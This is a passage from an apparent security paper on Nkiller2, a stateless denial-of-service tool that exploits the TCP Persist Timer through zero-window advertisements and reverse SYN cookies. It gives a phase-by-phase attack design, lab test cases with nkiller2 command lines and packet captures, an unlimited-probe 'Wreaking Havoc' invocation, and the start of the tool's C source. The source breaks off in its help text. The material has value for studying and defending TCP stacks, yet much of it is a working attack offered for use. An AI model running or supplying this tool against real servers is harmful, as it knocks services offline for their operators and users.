idea at [1]. Nkiller2 takes the attack to another level, that we shall
discuss shortly.


---- [ 4.1 - Kernel memory exhaustion pitfalls

The idea presented at [1] was, at the time it was published, an almost
deadly attack. Netkill's purpose was to exhaust the available kernel
memory by issuing multiple requests that would go unanswered on the 
receiver's end as far as the ACKing of the data was concerned. These
requests would hopefully involve the sending of a small amount of data,
such that the user application would write the data all at once, issue
a close(2) call and move on to serve the rest of the requests. As we
mentioned before, as long as the application has closed the socket, the
TCP state is going to become FIN_WAIT_1 in which the socket is marked as
orphan, meaning it is detached from the userspace and doesn't anymore clog
the connection queue. Hence, a rather big number of such requests can be
made without being concerned that the user application will run out of
available connection slots. Each request will partially fill the 
corresponding kernel buffers, thus bringing the system down to its knees
after no more kernel memory is available.
However, the idea behind Netkill no longer poses a threat to modern
network stack implementations. Most of them provide mechanisms that
nullify the attack's potential by instantly killing any orphan sockets,
in case of urgent need of memory. For example, Linux calls a specific 
handler, tcp_out_of_recources(), which deals with such situations.


net/ipv4/tcp_timer.c:
/---------------------------------------------------------------------\

/* Do not allow orphaned sockets to eat all our resources.
 * This is direct violation of TCP specs, but it is required
 * to prevent DoS attacks. It is called when a retransmission timeout
 * or zero probe timeout occurs on orphaned socket.
 *
 * Criteria is still not confirmed experimentally and may change.
 * We kill the socket, if:
 * 1. If number of orphaned sockets exceeds an administratively configured
 *    limit.
 * 2. If we have strong memory pressure.
 */
static int tcp_out_of_resources(struct sock *sk, int do_reset)
{
    struct tcp_sock *tp = tcp_sk(sk);
    int orphans = atomic_read(&tcp_orphan_count);

    /* If peer does not open window for long time, or did not transmit 
     * anything for long time, penalize it. */
    if ((s32)(tcp_time_stamp - tp->lsndtime) > 2*TCP_RTO_MAX || !do_reset)
        orphans <<= 1;

    /* If some dubious ICMP arrived, penalize even more. */
    if (sk->sk_err_soft)
        orphans <<= 1;

    if (orphans >= sysctl_tcp_max_orphans ||
        (sk->sk_wmem_queued > SOCK_MIN_SNDBUF &&
         atomic_read(&tcp_memory_allocated) > sysctl_tcp_mem[2])) {
        if (net_ratelimit())
            printk(KERN_INFO "Out of socket memory\n");

        /* Catch exceptional cases, when connection requires reset.
         *      1. Last segment was sent recently. */
        if ((s32)(tcp_time_stamp - tp->lsndtime) <= TCP_TIMEWAIT_LEN ||
            /*  2. Window is closed. */
            (!tp->snd_wnd && !tp->packets_out))
            do_reset = 1;
        if (do_reset)
            tcp_send_active_reset(sk, GFP_ATOMIC);
        tcp_done(sk);
        NET_INC_STATS_BH(LINUX_MIB_TCPABORTONMEMORY);
        return 1;
    }
    return 0;
}

\---------------------------------------------------------------------/


The comments and the code speak for themselves. tcp_done() moves the
TCP state to TCP_CLOSE, essentially killing the connection, which will
probably be in FIN_WAIT_1 state at that time (the tcp_done function is
also called by tcp_write_err() mentioned above).

In addition to the above pitfall, the way Netkill works, wastes a lot of
bandwidth from both sides, making the attack more noticeable and less
efficient. Netkill sends a flurry of syn packets to the victim, waits for
the SYNACK and responds by completing the 3way handshake and piggybacking
the payload request in the current ACK. Since, any data replies from the
victim's user application (usually a web server) will go unanswered, TCP
will start retransmitting these packets. These packets, however, are ones
that carry a load of data with them, whose size is proportional to the
initial window and mss advertised. The minimum amount of data is usually
512 bytes, which given the vast amount of retransmissions that will
eventually take place, can lead to network congestion, lost packets and
sysadmin red alarms.

As we can see, kernel memory exhaustion is not an easily accomplished
option in today's operating systems, at least by means of a generic DoS
attack. The attack vector has to be adapted to current circumstances.


---- [ 4.2 - Attack Vector

Our goal is to perform a generic DoS attack that meets the following
criteria:

a) The duration of the attack has to be prolonged as long as possible. The
TCP Persist Timer exploitation extends the duration to infinity. The only
time limits that will take place will be the ones imposed by the userspace
application.

b) No resources will be spent on our part to keep any kind of state 
information from the victim. Any memory resources spent will be O(1),
which means regardless of the number of probes we send to the victim, our
own memory needs will never surpass a certain initial amount.

c) Bandwidth throttling will be kept to a minimum. Traffic congestion has
to be avoided if possible. 

d) The attack has to affect the availability of both the userspace
application as well as the kernel, at the extent that this is feasible.


To meet requirement 'b', we are going to use a packet-triggering behaviour
and the, now old, technique of reverse (or client) syn cookies. Basically,
this means that our answers will strictly depend on nothing else other 
than the packets received from the victim. How is this even possible? We
are going to use a series of packet-parsing techniques and craft the
packets in such a way that they carry within themselves any information
that is needed to make decisions.


The general procedure will go like this:

- Phase 1.

Attacker sends a group of SYN packets to the victim. In the sequence
number field, he has encoded a magic number that stems from the
cryptographic hash of { destination IP & port, source IP & port } and a
secret key. By this way, he can discern if any SYNACK packet he gets,
actually corresponds to the SYN packets he just sent. He can accomplish
that by comparing the (ACK seq number - 1) of the victim's SYNACK reply
with the hash of the same packet's socket quadruple based on the secret
key. We subtract 1, since the SYN flag occupies one sequence number
as stated by RFC 793. The above technique is known as reverse syn cookies,
since they differ from the usual syn cookies which protect from syn
flooding, in that they are used from the reverse side, namely the client
and not the server. Responsible for the cookie calculation and subsequent
encoding is Nkiller2's calc_cookie() function.
Now, apart from the sequence number encoding, we are also going to use a
nifty facility that TCP provides, as means to our own ends. The TCP
Timestamp Option is normally used as another way to estimate the RTT.
The option uses two 32bit fields, 'tsval' which is a value that increases
monotonically by the TCP timestamp clock and which is filled in by the
current sender and 'tsecr' - timestamp echo reply - which is the peer's
echoed value as stated in the tsval of the packet to which the current one
replies. The host initiating the connection places the option in the
first SYN packet, by filling tsval with a value, and zeroing tsecr. Only
if the peer replies with a Timestamp in the SYNACK packet, can any future
segments keep containing the option. build_timestamp() embeds the
timestamp option in the crafted TCP header, while get_timestamp() extracts
it from a packet reply.

      TCP Timestamps Option (TSopt):

         Kind: 8

         Length: 10 bytes

          +-------+-------+---------------------+---------------------+
          |Kind=8 |  10   |   TS Value (TSval)  |TS Echo Reply (TSecr)|
          +-------+-------+---------------------+---------------------+
              1       1              4                     4

We are going to use the Timestamp option as a means to track time. We will
later have to exploit the TCP Persist Timer and eventually answer to some
of his probes, but this will have to involve calculating how much time has
passed. Consequently, we are going to encode our own system's current time
inside the first 'tsval'. In the SYNACK reply that we are going to get,
'tsecr' will reflect that same value. Thus, by subtracting the value
placed in the echo reply field from the current system time, we can deduce
how much time has passed since our last packet transmission without
keeping any stateful information for each probe. We are going to extract
and encode timestamp information from every packet hereafter. Timestamps
are supported by every modern network stack implementation, so we aren't
going to have any trouble dealing with them.


- Phase 2.

The victim replies with a SYNACK to each of the attacker's initial SYN
probes. These kinds of packets are really easy to differentiate between
the rest of the ones we will be receiving, since no other packet will
have both the SYN flag and the ACK flag set. In addition, as we noted
above, we can realize if these packets actually belong to our own probes
and not some other connection happening at the same time to the host, by
using the reverse syn cookie technique. 
We have to mention here that under no circumstances should our system's 
kernel be let to affect any of our connections. Thus, we should take care
beforehand to have filtered any traffic destined to or coming from the 
victim's attacked ports.
Having gotten the victim's SYNACK replies, we complete the 3way handshake
by sending the ACK required (send_probe: S_SYNACK). We also piggyback the
data of the targeted userspace application request. We save bandwidth,
time and trouble by adopting a perfectly allowable behaviour. Nothing
else exciting happens here.


- Phase 3.

Now things get a bit more complicated. It is here that the road starts
forking depending on the target host's network stack implementation.
Nkiller2 uses the notion of virtual states, as I called them, which are
a way to differentiate between each unique case by parsing the packet
for relevant information. The handler responsible for parsing the victim's
replies and deciding the next virtual state is check_replies(). It sets
the variable 'state' accordingly and main() can then deduce inside it's
main loop the next course of action, essentially by calling the generic
send_probe() packet-crafter with the proper state argument and updating
some of its own loop variables.

First case: the target host sends a pure ACK (meaning a packet with no
data), which acknowledges our payload sent in Phase 2. This virtual
state is mentioned as S_FDACK (State - First Data Acknowledgment) in the
Nkiller2 codebase.

Second case: the target host sends the ACK which acknowledged our payload
from Phase 2, piggybacked with the first data reply of the userspace
application to which we made the request. This usually happens due to the
Delayed Acknowledgment functionality according to which, TCP waits some
time (class of microseconds) to see if there are any data which it can
send along with an ACK. 

Usually, Linux behaviour follows the first case while *BSD and Windows
follow the second. The critical question here is when to send the zero
window advertisement. Ideally, we could reply to the first case's pure
ACK with an ACK of our own (with the same acknowledgment number as the 
sequence number in the victim's packet) that advertised a zero window.
However, in most cases we won't have that chance, since the victim's
TCP will send, immediately after this pure ACK, the first data of the
userspace application in a separate segment. Thus, if we advertise a
zero window when the opposite TCP has already wrote to the network
the first data, we will fail to trigger the Persist Timer as we saw
during the analysis in part 3 of this paper. Consequently, we play it
safe and choose to ignore the FDACK and wait for the first segment of
data to arrive.


- Phase 4 

This stage also differs from one operating system to another, since it
is deeply connected to Phase 3. For every number mentioned from now on,
assume that Nkiller's initial window advertisement and mss is 1024.
Linux, under normal circumstances, will send two data segments with a 
minimum amount of 512 bytes each. Additionally, any data segment following
the first one, will have the PUSH flag set. On the other hand, *BSD and 
BSD-derivative implementations will send one bigger data segment of 1024
bytes, without setting the PUSH flag.
To be able to take the right decisions for each unique case involved,
Nkiller2 will have to be provided with a template number. It is trivial to
identify the different network stacks by using already existing tools, so
when you are unsure about the target system, either use Nmap's OS
fingerprinting capability or at worst, a trial-and-error method. At the
moment with only 2 different templates (T_LINUX and T_BSDWIN), Nkiller2
is able to work against a vast amount of systems.
In the default template (Linux), Nkiller2 is going to send a zero window
advertisement on the ACK of the second segment (which is going to involve
acking the first segment as well), while when dealing with BSD or Windows,
it will send it on the ACK of the first and only data segment. The
resolving between these two cases takes place in send_probe()'s main body
in 'case S_DATA_0' (State - Data 0, as in first data packet).


- Phase 5

Having successfully sent the zero window packet (regardless of how and
when that happened), the target host's TCP will start sending zero probes.
This is where we accomplish meeting requirement 'c' - bandwidth waste
limitation. Every retransmission that will take place, will involve pure
ACKs (Linux) or at maximum 1 byte of data (BSD/Windows). Every zero probe
is only 52 bytes long, counting TCP/IP headers and the TCP Timestamp
option, in contrast with the size of the retransmission packets 
(512 + 40 bytes or 1024 + 40 bytes each) that would take place if we had
triggered the TCP retransmission timer, as in netkill's case.
An interesting issue here is to decide on when is the best time to reply
to the zero probes, so that the TCP persist timer is ideally prolonged to
last forever with the fewest packets possible. Using the TCP timestamp
technique, we can calculate the time elapsed from the moment we sent the
zero window advertisement (since that was our last packet and that one's
time value will be echoed in 'tsecr') to the moment we got the packet.


check_replies()
/---------------------------------------------------------------------\


      if (get_timestamp(tcp, &tsval, &tsecr)) {
        if (gettimeofday(&now, NULL) < 0)
          fatal("Couldn't get time of day\n");
        time_elapsed = now.tv_sec - tsecr;
        if (o.debug) 
          (void) fprintf(stdout, "Time elapsed: %u (sport: %u)\n",
              time_elapsed, sockinfo.sport);
      }

      ...

      if (ack == calc_ack && (!datalen || datalen == 1) 
          && time_elapsed >= o.probe_interval) {
        state = S_PROBE;
        goodone++;
        break;
      }

\---------------------------------------------------------------------/


Hence, we can decide on whether or not we should send a reply to the
current zero probe (S_PROBE), depending on a predetermined rough estimate
of the time lapse. We also use this 'probe_interval' value to
differentiate between a zero probe and the FDACK, since there are no other
packet characteristics, apart from time arrival, that we can take into
account in this stateless manner. This phase marks the accomplishment of
our 1st goal - prolonging the attack to as much as possible.


A graphical representation of the procedure is shown below. Remember that
the states are purely virtual. We do not keep any kind of information on
our part.


      (cookie OK)   +----------+ 
 SYN -------------> | S_SYNACK | 
      rcv SYNACK    +----------+ 
                          |       
               ACK SYNACK |
            send request  |
                          |     pure ACK       +---------+ 
                          | ---------------->  | S_FDACK | 
                          |   time_elapsed <   +---------+ 
                          |   probe_interval      ignore
                          |
                 got Data |   
                          V                         
                     +----------+       
                     | S_DATA_0 |
                     +----------+       
                          |
                         / \
                        /   \ 
          T_BSDWIN     /     \   T_LINUX (default)
      ----------------/       \ ---------------        
      |                                       |
      |                                       | got Data (PSH)
      |                                       | ACK(data0)
      V                                       V
  ACK(data0) &                          +----------+
  send 0 window                         | S_DATA_1 |      
      |                                 +----------+
      |---------------         ---------------|
                      \       /   ACK(data1) & send 0 window
                       \     /
                        \   /
                         \ /
     |------> time_elapsed >= probe_interval
     |                    |
     |                    |
     |                    V
     |               +---------+
     |               | S_PROBE | --------> send probe reply
     |               +---------+
     |                    |    
     |--------------------|


The only thing that still needs to be answered is to what extent we have
achieved goal 'd'. How efficient is the attack really? The answer is, that
it depends on what we are attacking. Attacking one userspace application
will usually lead to either backlog queue collapse or reaching the maximum
allowable number of concurrent accepted connections. In both cases, the
availability of the userspace application will drop down to zero and will
stay in that condition for a possibly unlimited amount of time. Keep in
mind though that robust server applications like Apache have a Timeout of
their own, which is independent of TCP's. Quoting from Apache's manual:

   "The TimeOut directive currently defines the amount of time Apache will
    wait for three things:

   1. The total amount of time it takes to receive a GET request.
   2. The amount of time between receipt of TCP packets on a POST or PUT
        request.
   3. The amount of time between ACKs on transmissions of TCP packets in
        responses."

By default, Apache httpd's TimeOut = 300 which means 5 minutes. Following
a similar approach, lighttpd's default timeout is about 6 minutes.
Even then, as long as the attack cycle continues (Hint: Nkiller's option
-n0), there is no hope for any server not protected by a stateful firewall
that limits the total number of packets reaching the host (which still
won't be enough by itself given the TCP Persist Timer's exploitation).

At the same time, useful kernel resources are wasted on the SendQueue of
each established connection. However, for kernel memory exhaustion to
occur, we will have to perform a concurrent attack at multiple
applications (Nkiller2 isn't optimized for this though). By this way,
the amount of kernel resources wasted will be proportional to the number
of the attacked applications and the amount of successful connections on
each of them. Even if one service is brought down temporarily for one
reason or another, there will still be the other applications wasting
memory with a filled up TCP SendQueue.


---- [ 4.3 Test cases

Time for some real world examples. We are going to demonstrate how
Nkiller2 exploits the Persist Timer functionality and at the same time
point out the different behaviour that is exhibited from a Linux system
in contrast with an OpenBSD system. The file requested has to be more
than 4.0 Kbytes (experimental value).

- Test Case 1.

Attacker: 10.0.0.12, Linux 2.6.26
Target: 10.0.0.50, Apache1.3, OpenBSD 4.3

# iptables -A INPUT -s 10.0.0.50 -p tcp --dport 80 -j DROP
# iptables -A INPUT -s 10.0.0.50 -p tcp --sport 80 -j DROP
# ./nkiller2 -t 10.0.0.50 -p80 -w /file -v -n1 -T1 -P120 -s0 -g

Starting Nkiller 2.0 ( http://sock-raw.org )
Probes: 1
Probes per round: 100
Pcap polling time: 100 microseconds
Sleep time: 0 microseconds
Key: Nkiller31337
Probe interval: 120 seconds
Template: BSD | Windows
Guardmode on


# tcpdump port 80 and host 10.0.0.50 -n

08:55:30.017021 IP 10.0.0.12.40428 > 10.0.0.50.80: S 3456779693:
3456779693(0) win 1024 <timestamp 1232693730 0,nop,nop,mss 1024>
08:55:30.017280 IP 10.0.0.50.80 > 10.0.0.12.40428: S 3072651811:
3072651811(0) ack 3456779694 win 16384 <mss 1460,nop,nop,timestamp
464912143 1232693730>
08:55:30.017461 IP 10.0.0.12.40428 > 10.0.0.50.80: . 1:23(22) ack 1
win 1024 <timestamp 1232693730 464912143,nop,nop>
08:55:30.019288 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1:1013(1012) ack 23
win 17204 <nop,nop,timestamp 464912143 1232693730>
08:55:30.019311 IP 10.0.0.12.40428 > 10.0.0.50.80: . ack 1013 win 0
<timestamp 1232693730 464912143,nop,nop>
08:55:35.009929 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912153 1232693730>
08:55:40.009505 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912163 1232693730>
08:55:45.009056 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912173 1232693730>
08:55:53.008388 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912189 1232693730>
08:56:09.007027 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912221 1232693730>
08:56:41.004286 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912285 1232693730>
08:57:40.999239 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
win 17204 <nop,nop,timestamp 464912405 1232693730>
08:57:40.999910 IP 10.0.0.12.40428 > 10.0.0.50.80: . ack 1013 win 0
<timestamp 1232693860 464912405,nop,nop>
...


Notice that OpenBSD transmits httpd's initial data in one segment in which
the ACK to our payload is included. Nkiller2 acknowledges that packet,
advertising at the same time a zero window. After that, OpenBSD's TCP
transmits a zero probe and sets the Persist Timer. After a little more
than 120 seconds (57:40 - 55:30), we answer to the Persist Timer's probe.
Note that we specified the probe_interval with the option -P120
(approximately 120 seconds).


- Test Case 2.

Attacker: 10.0.0.12, Linux 2.6.26
Target: 10.0.0.101, Apache2.2.3, Debian "etch" (2.6.18)

# iptables -A INPUT -s 10.0.0.101 -p tcp --dport 80 -j DROP
# iptables -A INPUT -s 10.0.0.101 -p tcp --sport 80 -j DROP
# ./nkiller2 -t 10.0.0.101 -p80 -w /file -n1 -T0 -P50 -s0 -v

Starting Nkiller 2.0 ( http://sock-raw.org )
Probes: 1
Probes per round: 100
Pcap polling time: 100 microseconds
Sleep time: 0 microseconds
Key: Nkiller31337
Probe interval: 50 seconds
Template: Linux


# tcpdump port 80 and host 10.0.0.101 -n

01:09:33.350783 IP 10.0.0.12.26528 > 10.0.0.101.80: S 3497611066:
3497611066(0) win 1024 <timestamp 1232752173 0,nop,nop,mss 1024>
01:09:33.350893 IP 10.0.0.101.80 > 10.0.0.12.26528: S 2167814821:
2167814821(0) ack 3497611067 win 5792 <mss 1460,nop,nop,timestamp
4294906445 1232752173>
01:09:33.351189 IP 10.0.0.12.26528 > 10.0.0.101.80: . 1:23(22) ack 1
win 1024 <timestamp 1232752173 4294906445,nop,nop>
01:09:33.351308 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294906445 1232752173>
01:09:33.382100 IP 10.0.0.101.80 > 10.0.0.12.26528: . 1:513(512) ack 23
win 5792 <nop,nop,timestamp 4294906452 1232752173>
01:09:33.382138 IP 10.0.0.101.80 > 10.0.0.12.26528: P 513:1025(512) ack 23
win 5792 <nop,nop,timestamp 4294906452 1232752173>
01:09:33.389359 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 513 win 512
<timestamp 1232752173 4294906452,nop,nop>
01:09:33.389508 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 1025 win 0
<timestamp 1232752173 4294906452,nop,nop>
01:09:33.590164 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294906505 1232752173>
01:09:33.998135 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294906607 1232752173>
01:09:34.814073 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294906811 1232752173>
01:09:36.445959 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294907219 1232752173>
01:09:39.709739 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294908035 1232752173>
01:09:46.237279 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294909667 1232752173>
01:09:59.292377 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294912931 1232752173>
01:10:25.402550 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
<nop,nop,timestamp 4294919459 1232752173>
01:10:25.427760 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 1024 win 0
<timestamp 1232752225 4294919459,nop,nop>
...


Linux first sends a pure ACK (which is ignored by Nkiller2) and then
transmits the first 2 data segments (512 bytes each). Nkiller2 waits until
both of them arrive and acknowledges them with one zero window ACK packet.
Linux then starts sending us zero probes (which have a datalength equal to
zero in constrast with *BSD which send 1 byte of data), that go unanswered
until about (10:25 - 09:33) 50 seconds pass.


- Test Case 'Wreaking Havoc'

# nkiller2 -t <target> -p80 -w <path> -n0 -T0 -P100 -s0 -v -N100

-n0: unlimited probes
-N100: will send 100 SYN probes per round (a round finishes when
we either get a data segment or a zero probe)

Use at your own discretion.


-- [ 5 - Nkiller2 implementation 

/*
 *  Nkiller 2.0 - a TCP exhaustion/stressing tool
 *  Copyright (C) 2009 ithilgore <ithilgore.ryu.L@gmail.com>
 *  sock-raw.org
 *
 *  This program is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

/*
 * COMPILATION:
 *  gcc nkiller2.c -o nkiller2 -lpcap -lssl -Wall -O2
 * Has been tested and compiles successfully on Linux 2.6.26 with gcc
 * 4.3.2 and FreeBSD 7.0 with gcc 4.2.1
 */


/*
 * Enable BSD-style (struct ip) support on Linux.
 */
#ifdef __linux__
# ifndef __FAVOR_BSD
#  define __FAVOR_BSD
# endif
# ifndef __USE_BSD
#  define __USE_BSD
# endif
# ifndef _BSD_SOURCE
#  define _BSD_SOURCE
# endif
# define IPPORT_MAX 65535u
#endif


#include <sys/types.h>
#include <sys/socket.h>

#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

#include <openssl/hmac.h>

#include <errno.h>
#include <pcap.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <time.h>
#include <unistd.h>
#include <getopt.h>


#define DEFAULT_KEY             "Nkiller31337"
#define DEFAULT_NUM_PROBES      100000
#define DEFAULT_PROBES_RND      100
#define DEFAULT_POLLTIME        100
#define DEFAULT_SLEEP_TIME      100
#define DEFAULT_PROBE_INTERVAL  150

#define WEB_PAYLOAD     "GET / HTTP/1.0\015\012\015\012"

/* Timeval subtraction in microseconds */
#define TIMEVAL_SUBTRACT(a, b) \
  (((a).tv_sec - (b).tv_sec) * 1000000L + (a).tv_usec - (b).tv_usec)

/*
 * Pseudo-header used for checksumming; this header should never
 * reach the wire
 */
typedef struct pseudo_hdr {
  uint32_t src;
  uint32_t dst;
  unsigned char mbz;
  unsigned char proto;
  uint16_t len;
} pseudo_hdr;


/*
 * TCP timestamp struct 
 */
typedef struct tcp_timestamp {
  char kind;
  char length;
  uint32_t tsval __attribute__((__packed__));
  uint32_t tsecr __attribute__((__packed__));
  char padding[2];
} tcp_timestamp;

/*
 * TCP Maximum Segment Size
 */
typedef struct tcp_mss {
  char kind;
  char length;
  uint16_t mss __attribute__((__packed__));
} tcp_mss;


/* Network stack templates */
enum {
  T_LINUX,
  T_BSDWIN
};

/* Possible replies */
enum {
  S_ERR,      /* no reply, RST, invalid packet etc */
  S_SYNACK,   /* 2nd part of initial handshake */
  S_FDACK,    /* first data ack - in reply to our first data */
  S_DATA_0, /* first data packet */
  S_DATA_1,   /* second data packet */
  S_PROBE     /* persist timer probe */
};

/*
 * Ethernet header stuff.
 */
#define ETHER_ADDR_LEN  6
#define SIZE_ETHERNET   14
typedef struct ethernet {
  u_char ether_dhost[ETHER_ADDR_LEN]; /* Destination host address */
  u_char ether_shost[ETHER_ADDR_LEN]; /* Source host address */
  u_short ether_type;                 /* Frame type */
} ether_hdr;


/*
 * Global nkiller options struct
 */
typedef struct Options {
  char target[16];
  char skey[32];
  char payload[256];
  char path[256];         /* relative to virtual-host/ip path */
  char vhost[256];        /* virtual host name */
  uint16_t *portlist;
  unsigned int probe_interval; /* interval for our persist probe reply */
  unsigned int probes;    /* total number of fully-connected probes */
  unsigned int probes_per_rnd; /* number of probes per round */
  unsigned int polltime;  /* how many microsecods to poll pcap */
  unsigned int sleep;     /* sleep time between each probe */
  int template;           /* victim network stack template */
  int dynamic;            /* remove ports from list when we get RST */
  int guardmode;          /* continue answering to zero probes */
  int verbose;
  int debug;              /* some debugging info */
  int debug2;             /* all debugging info */
} Options;


/*
 * Port list types
 */
typedef struct port_elem {
  uint16_t port_val;
  struct port_elem *next;
} port_elem;

typedef struct port_list {
  port_elem *first;
  port_elem *last;
} port_list;

/*
 * Host information
 */
typedef struct HostInfo {
  struct in_addr daddr; /* target ip address */
  char *payload;
  char *url;
  char *vhost;
  size_t plen;            /* payload length */
  size_t wlen;            /* http request length */
  port_list ports;        /* linked list of ports */
  unsigned int portlen;   /* how many ports */
} HostInfo;


typedef struct SniffInfo {
  struct in_addr saddr;   /* local ip */
  pcap_if_t *dev;
  pcap_t *pd;
} SniffInfo;


typedef struct Sock {
  struct in_addr saddr;
  struct in_addr daddr;
  uint16_t sport;
  uint16_t dport;
} Sock;


/* global vars */
Options o;


/**** function declarations ****/

/* helper functions */
static void fatal(const char *fmt, ...);
static void usage(void);
static void help(void);
static void *xcalloc(size_t nelem, size_t size);
static void *xmalloc(size_t size);
static void *xrealloc(void *ptr, size_t size);

/* port-handling functions */
static void port_add(HostInfo *Target, uint16_t port);
static void port_remove(HostInfo *Target, uint16_t port);
static int port_exists(HostInfo *Target, uint16_t port);
static uint16_t port_get_random(HostInfo *Target);
static uint16_t *port_parse(char *portarg, unsigned int *portlen);

/* packet helper functions */
static uint16_t checksum_comp(uint16_t *addr, int len);
static void handle_payloads(HostInfo *Target);
static uint32_t calc_cookie(Sock *sockinfo);
static char *build_mss(char **tcpopt, unsigned int *tcpopt_len,
    uint16_t mss);
static int get_timestamp(const struct tcphdr *tcp, uint32_t *tsval,
    uint32_t *tsecr);
static char *build_timestamp(char **tcpopt, unsigned int *tcpopt_len,
    uint32_t tsval, uint32_t tsecr);

/* sniffing functions */
static void sniffer_init(HostInfo *Target, SniffInfo *Sniffer);
static int check_replies(HostInfo *Target, SniffInfo *Sniffer, 
    u_char **reply);

/* packet handling functions */
static void send_packet(char* packet, unsigned int *packetlen);
static void send_syn_probe(HostInfo *Target, SniffInfo *Sniffer);
static int send_probe(const u_char *reply, HostInfo *Target, int state);
static char *build_tcpip_packet(const struct in_addr *source,
    const struct in_addr *target, uint16_t sport, uint16_t dport,
    uint32_t seq, uint32_t ack, uint8_t ttl, uint16_t ipid,
    uint16_t window, uint8_t flags, char *data, uint16_t datalen,
    char *tcpopt, unsigned int tcpopt_len, unsigned int *packetlen);


/**** function definitions ****/


/*
 * Wrapper around calloc() that calls fatal when out of memory
 */
static void *
xcalloc(size_t nelem, size_t size)
{
  void *p;

  p = calloc(nelem, size);
  if (p == NULL)
    fatal("Out of memory\n");
  return p;
}


/*
 * Wrapper around xcalloc() that calls fatal() when out of memory
 */
static void *
xmalloc(size_t size)
{
  return xcalloc(1, size);
}


static void *
xrealloc(void *ptr, size_t size)
{
  void *p;

  p = realloc(ptr, size);
  if (p == NULL)
    fatal("Out of memory\n");
  return p;
}


/*
 * vararg function called when sth _evil_ happens
 * usually in conjunction with __func__ to note
 * which function caused the RIP stat
 */
static void
fatal(const char *fmt, ...)
{
  va_list ap;
  va_start(ap, fmt);
  (void) vfprintf(stderr, fmt, ap);
  va_end(ap);
  exit(EXIT_FAILURE);
}


/* Return network stack template */
static const char *
get_template(int template)
{
  switch (template) {
    case T_LINUX:
      return("Linux");
    case T_BSDWIN:
      return("BSD | Windows");
    default:
      return("Unknown");
  }
}


/*
 * Print a short usage summary and exit
 */
static void
usage(void)
{
  fprintf(stderr,
      "nkiller2 [-t addr] [-p ports] [-k key] [-n total probes]\n"
      "         [-N probes/rnd] [-c msec] [-l payload] [-w path]\n"
      "         [-s sleep] [-d level] [-r vhost] [-T template]\n"
      "         [-P probe-interval] [-hvyg]\n"
      "Please use `-h' for detailed help.\n");
  exit(EX_USAGE);
}


/*
 * Print detailed help
 */
static void
help(void)
{
  static const char *help_message =
    "Nkiller2 - a TCP exhaustion & stressing tool\n"
    "\n"
    "Copyright (c) 2008 ithilgore <ithilgore.ryu.L@gmail.com>\n"
    "http://sock-raw.org\n"
    "\n"
    "Nkiller is free software, covered by the GNU General Public License,"
    "\nand you are welcome to change it and/or distribute copies of it "
    "under\ncertain conditions.  See the file `COPYING' in the source\n"
    "distribution of nkiller for the conditions and terms that it is\n"
    "distributed under.\n"
    "\n"
    "    WARNING:\n"
    "The authors disclaim any express or implied warranties, including,\n"
    "but not limited to, the implied warranties of merchantability and\n"
    "fitness for any particular purpose. In no event shall the authors "
    "or\ncontributors be liable for any direct, indirect, incidental, "
    "special,\nexemplary, or consequential damages (including, but not "
    "limited to,\nprocurement of substitute goods or services; loss of "
    "use, data, or\nprofits; or business interruption) however caused and"
    " on any theory\nof liability, whether in contract, strict liability,"
    " or tort\n(including negligence or otherwise) arising in any way out"
    " of the use\nof this software, even if advised of the possibility of"
    " such damage.\n\n"
    "Usage:\n"
    "\n"
    "    nkiller2 -t <target> -p <ports> [options]\n"
    "\n"
    "Mandatory:\n"
    "  -t target          The IP address of the target host.\n"
    "  -p port[,port]     A list of ports, separated by commas. Specify\n"
    "                     only ports that are known to be open, or use\n"
    "                     -y when unsure.\n"
    "Options:\n"
    "  -c msec            Time in microseconds, between each pcap poll\n"
    "                     for packets (pcap poll timeout).\n"
    "  -d level           Set the debug level (1: some, 2: all)\n"
    "  -h                 Print this help message.\n"
    "  -k key             Set the key for reverse SYN cookies.\n"
    "  -l payload         Additional payload string.\n"
    "  -s sleep           Average time in ms between each probe.\n"
    "  -n probes          Set the number of probes, 0 for unlimited.\n"
    "  -N probes/rnd      Number of probes per round.\n"
    "  -T template        Attacked network stack template:\n"
    "                     0. Linux (default)\n"
    "                     1. *BSD | Windows\n"
    "  -P time            Number of seconds after which we reply to the\n"
